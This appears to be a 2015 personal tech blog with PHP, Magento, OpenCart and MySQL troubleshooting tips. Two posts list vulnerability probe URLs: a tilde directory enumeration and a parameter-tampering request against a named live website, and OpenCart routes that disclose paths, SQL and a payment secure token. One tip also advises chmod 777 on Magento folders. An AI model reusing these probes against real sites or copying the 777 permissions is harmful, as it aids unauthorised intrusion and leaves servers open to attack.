Tuesday, 28 April 2015

The easiest way to validate an email address in php and html

 The easiest way to validate an email address in php and html

<?php if (filter_var('email@myemail.it', FILTER_VALIDATE_EMAIL) === false) { echo ' wrong email'; } ?>

via html just use the type "email" for your input and the browser will do the rest if you don't have particular needs.
Required will make your input mandatory.
 

<input type="email" name="email" required>

Never use only client side validations/checks.

[SOLUTION] opencart - taxes not applied for new customers group.

PROBLEM: Taxes not applied for new customers group.
SOLUTION: Opencart doesn't add the default taxation to new customer groups.
Just go to localization->Tax
edit your default tax and check your customers groups

Monday, 27 April 2015

Call to undefined method Mage_Core_Model_Config::cleanCache app/code/core/Mage/Core/Model/App.php on line 1088

 Call to undefined method Mage_Core_Model_Config::cleanCache app/code/core/Mage/Core/Model/App.php on line 1088

If you have a very old version of magento and/or you have lost files or you've updated only the library this error can happen (as happened to me).


Add this code

    /**
    * Configuration cache clean process
    *
    * @return Mage_Core_Model_Config
    */
    public function cleanCache()
    {
        return $this->reinit();
    }
   
in app/code/core/Mage/Core/Model/Config.php.


after the function reinit() - around line 600 in magento 1.3.1



References
http://phpcrossref.com/xref/magento/app/code/core/Mage/Core/Model/Config.php.html#cleancache

Magento folders that must be writeable - magento files permissions - chmod magento folders.

Magento folders that must be writeable - chmod magento folders.

The folders/files that must be  writeable (chmod 777 with subfolders) in magento are:


/yourrootfolder/var/
used by magento for the cache, reports, logs

/yourrootfolder/media/
used by magento for the images

/yourrootfolder/app/etc/
ONLY for OLDER magento version prior to 1.4 to update use_cache.ser only (afaik).





Fix c:\windows\system32\drivers\etc not resolving hosts to ip address.

Fix c:\windows\system32\drivers\etc not resolving hosts to ip address.

Before starting make sure that you have already modified correctly your
%SystemRoot%\System32\drivers\etc\hosts file

Verify that the path is your registry is pointing to the correct path

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DataBasePath

The default value should be
%SystemRoot%\System32\drivers\etc

Check that you are resolving correctly by using the ping command, it will show the resolved ip address even if unable to ping.
Don't use nslookup since it seems to ignore the hosts file by default.


Run (theorically useless ... but who knows) this command to flush the nameservers
ipconfig /flushdns
If you are using a browser remember to clear all your cache.

Verify that the hosts file have no extensions, just "hosts".
Make sure that there are no special characters inside the file.


If it's a system issue run
sfc /scannow


Another possibility is to reset your hosts file with this microsoft fix
https://support.microsoft.com/it-it/kb/972034

 

Sunday, 26 April 2015

Get the ID of latest updated rows and automatically update latest modification timestamp

If you want to get the IDs of the latest updated rows it during a query you can do something like that

SET @updatedrows := null; /*we will store here the IDs*/
UPDATE mytable SET coltoupdate = 'mycontent' WHERE myID > 5 AND (SELECT @updatedrows := CONCAT_WS(', ', myID, @updatedrows));
SELECT @updatedrows; /*shows the updated IDs*/

If the rows have already been updated via other queries that you are not aware of you, as far as I know, you must have a column (ex. lastmodified) in the database that must be updated each time that you do modifications.

To have *automatic* modifications it's better to use the triggers, if supported by your mysql version. (https://dev.mysql.com/doc/refman/5.0/en/create-trigger.html )

/*adding the lastmodified col to the table*/
ALTER TABLE mytable ADD lastmodified DATETIME NOT NULL;

/*creating the trigger*/
CREATE TRIGGER updatelastmodified BEFORE UPDATE ON `mytable ` FOR EACH ROW SET NEW.lastmodified = NOW();

After that you can select any recent modified thing
example:

SELECT * FROM mytable ORDER BY lastmodified DESC LIMIT 5; /*for the latest 5 modified - you can also concat them as before and reuse in other queries*/

Saturday, 18 April 2015

How to replace the definer Clause from Dump File Before migration in sql file dump

 How to Remove Definer Clause from Dump File Before Migrating a MySQL Database


 if you have sed (for windows go to http://gnuwin32.sourceforge.net/packages/sed.htm) available you can run
 sed -E 's/DEFINER=`[^`]+`@`[^`]+`/DEFINER=CURRENT_USER/g' yoursqlfile.sql > outputsqlfile.sql 

otherwise you can use on your preferred text editor as vim, notepad++ or emeditor (good for large files of several Terabytes) and  do a search/replace.

search string:
DEFINER=`[^`]+`@`[^`]+`

replace string:
DEFINER=CURRENT_USER

 You can also remove the definer (empty string) instead of using your current user.

Wednesday, 15 April 2015

fix - vqmod not working and no errors in the log files

How to fix vqmod for opencart not working and no errors in the log files.


If you have errors files /vqmod/logs/*.log you just need to fix the errors in your xml modifications in /vqmod/xml.

If you don't have any kind of modification and errors:

make sure that you have the file
vqmod_opencart.xml in /vqmod/xml.   - /vqmod/xml/vqmod_opencart.xml
If it's missing download the version of your vqmod (you can check it in vqmod.php).

Replace all the local relative paths to absolute in your config.php and admin/config.php.



Make sure to delete all the .cache files in the /vqmod folder and the browser's cache.


That's all

Monday, 13 April 2015

Download FREE (legal) IT Disaster Recovery Planning for Dummies EBOOK

I got the free download offer of the ebook

http://sysadmingrp.tradepub.com/free/w_wile157/prgm.cgi

"IT Disaster Recovery Planning for Dummies (a $19.99 value) FREE Until 4/21" – With this eBook, you’ll be prepared for anything from hackers to hurricanes!

 ok - you can also download it from here my copy (legal) copy

Sunday, 12 April 2015

Free up space in magento and manually delete magento cache.

SQL queries to clean most of the log and extra data that is not mandatory.
Don't use it if you need to debug problems or if you are exporting/importing data.
TRUNCATE dataflow_batch_export;
TRUNCATE dataflow_batch_import;
TRUNCATE log_customer;
TRUNCATE log_quote;
TRUNCATE log_summary;
TRUNCATE log_summary_type;
TRUNCATE log_url;
TRUNCATE log_url_info;
TRUNCATE log_visitor;
TRUNCATE log_visitor_info;
TRUNCATE log_visitor_online;
TRUNCATE report_viewed_product_index;
TRUNCATE report_compared_product_index;
TRUNCATE report_event;
TRUNCATE index_event;
TRUNCATE catalog_compare_item;

Note: Not all the tables are available on versions before version 1.8

You can freely delete in the web root folder

logs - var/log/*

cache - var/cache/*
reports - var/report/*










exports (your exported data!!!) - var/export/*
 session (also your current sessions - if they are saved in those files) - var/ssession/*
 temp files (usualy the folder is empty) - var/tmp/*



Before doing anything just backup your data and make sure that you don't need logs and other stuff.

magento - Fatal error: Call to a member function toHtml() on a non-object in app\code\core\Mage\Adminhtml\Block\System\Convert\Gui\Edit\Tabs.php on line 69

magento - Fatal error: Call to a member function toHtml() on a non-object in app\code\core\Mage\Adminhtml\Block\System\Convert\Gui\Edit\Tabs.php on line 69

Solution
check the integrity of this file
app\code\core\Mage\Adminhtml\Block\Catalog\Product\Helper\Form\Gallery.php
and all the other files that can be missing
Download a fresh copy of your own version of magento and replace eventual missing/corrupted files.

magento - fix Call to a member function addData() on a non-object wizardBlock->addData

Call to a member function addData() on a non-object wizardBlock->addData

solution:
check in app\code\core\Mage\Adminhtml\Block\System\Convert\Gui\Edit
if the "Tab" folder or the "upload.php", "view.php", "wizard.php" are missing or corrupted

If all the files are there just  backup the (edit) folder and replace the files with a fresh copy downloaded from the magento website.


Thursday, 9 April 2015

http://chiedoasilo.org/ | data leakage, xss, tilde directory enumeration, sql injection, system compromise


tilde directory enumeration
 http://chiedoasilo.org:80/*~1*/a.aspx?aspxerrorpath=/
C:\sitix\chiedoasilo\

http://chiedoasilo.org/templ_comunigazebo_det.asp?idlivello1=174&idlivello2=873&idlivello3=392&idril[test]=1
.... 

Tuesday, 7 April 2015

Opencart <= 2.0.1.3 data leakage, path disclosure, sql tables disclosure, secure token id disclosure, man in the middle proof of concept, sql injection

http://localhost/ocit/index.php?route=module/banner
you can see a simple Notice: Undefined index: banner_id


http://localhost/ocit/index.php?route=module/bestseller
you can see a simple  Notice: Undefined index: limit 


http://localhost/ocit/index.php?route=module/carousel
you can see a simple Notice: Undefined index: banner_id


http://localhost/ocit/index.php?route=module/featured
you can see a simple  Notice: Undefined index: limit


http://localhost/ocit/index.php?route=module/gallery (non stock extension/module)
you can see a simple Notice: Undefined index: filter_banner_id

http://localhost/ocit/index.php?route=module/news (non stock extension/module)
Notice: Error: Table 'test.oc_news' doesn't exist
Error No: 1146
SELECT * FROM oc_news n LEFT JOIN oc_news_description nd ON n.news_id = nd.news_id WHERE nd.language_id = '2' AND n.status = '1' ORDER BY date_added DESC LIMIT 0,5 in system\library\db\mysqli.php on line 41 
Notice: Trying to get property of non-object in catalog\model\extension\news.php on line 26
Warning: Invalid argument supplied for foreach() in catalog\controller\module\news.php on line 19


http://localhost/ocit/index.php?route=module/slideshow
you can see a simple Notice: Undefined index: banner_id 

http://localhost/ocit/index.php?route=module/special
Notice: Undefined index: limit in catalog\controller\module\special.php on line 24Notice: Undefined index: width in catalog\controller\module\special.php on line 32Notice: Undefined index: height in catalog\controller\module\special.php on line 32Warning: imagecreatetruecolor(): Invalid image dimensions in system\library\image.php on line 86Warning: imagecolorallocate() expects parameter 1 to be resource, boolean given in system\library\image.php on line 94Warning: imagefilledrectangle() expects parameter 1 to be resource, boolean given in system\library\image.php on line 97Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in system\library\image.php on line 99Notice: Undefined index: width in catalog\controller\module\special.php on line 32Notice: Undefined index: height in catalog\controller\module\special.php on line 32Warning: imagecreatetruecolor(): Invalid image dimensions in system\library\image.php on line 86Warning: imagecolorallocate() expects parameter 1 to be resource, boolean given in system\library\image.php on line 94Warning: imagefilledrectangle() expects parameter 1 to be resource, boolean given in system\library\image.php on line 97Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in system\library\image.php on line 99


http://localhost/ocit/index.php?route=payment/authorizenet_sim
Notice: Undefined index: order_id in catalog\controller\payment\authorizenet_sim.php on line 10Notice: Undefined index: order_id in catalog\controller\payment\authorizenet_sim.php on line 13Notice: Undefined index: order_id in catalog\controller\payment\authorizenet_sim.php on line 21


http://localhost/ocit/index.php?route=payment/bluepay_hosted
Fatal error: Class 'Controllerpaymentbluepayhosted' not found

http://localhost/ocit/index.php?route=payment/firstdata
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/globalpay
Notice: Undefined index: order_id


http://localhost/ocit/index.php?route=payment/klarna_account
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/klarna_invoice
Notice: Undefined index: order_id
 
http://localhost/ocit/index.php?route=payment/liqpay
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/nochex
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/paymate
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/paypoint
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/payza
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/pp_payflow
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/pp_payflow_iframe
Notice: Undefined index: order_id in catalog\controller\payment\pp_payflow_iframe.php on line 9Notice: Undefined index: order_id in catalog\controller\payment\pp_payflow_iframe.php on line 25
INSERT INTO `oc_paypal_payflow_iframe_order` SET `order_id` = '0', `secure_token_id` = 'f61192e89c716049bb146a7a91b2acfe' in system\library\db\mysqli.php on line 41Notice: Undefined index: code in catalog\controller\payment\pp_payflow_iframe.php on line 46Notice: Undefined index: iso_code_2 in catalog\controller\payment\pp_payflow_iframe.php on line 48

http://localhost/ocit/index.php?route=payment/pp_standard
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/realex
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/realex_remote
Warning: Invalid argument supplied for foreach() in catalog\controller\payment\realex_remote.php on line 32
 
http://localhost/ocit/index.php?route=payment/securetrading_pp
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/securetrading_ws
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/skrill
Notice: Undefined index: order_id

http://localhost/ocit/index.php?route=payment/twocheckout
Notice: Undefined index: order_id

More info will be available later...

Twitter Delicious Facebook Digg Stumbleupon Favorites More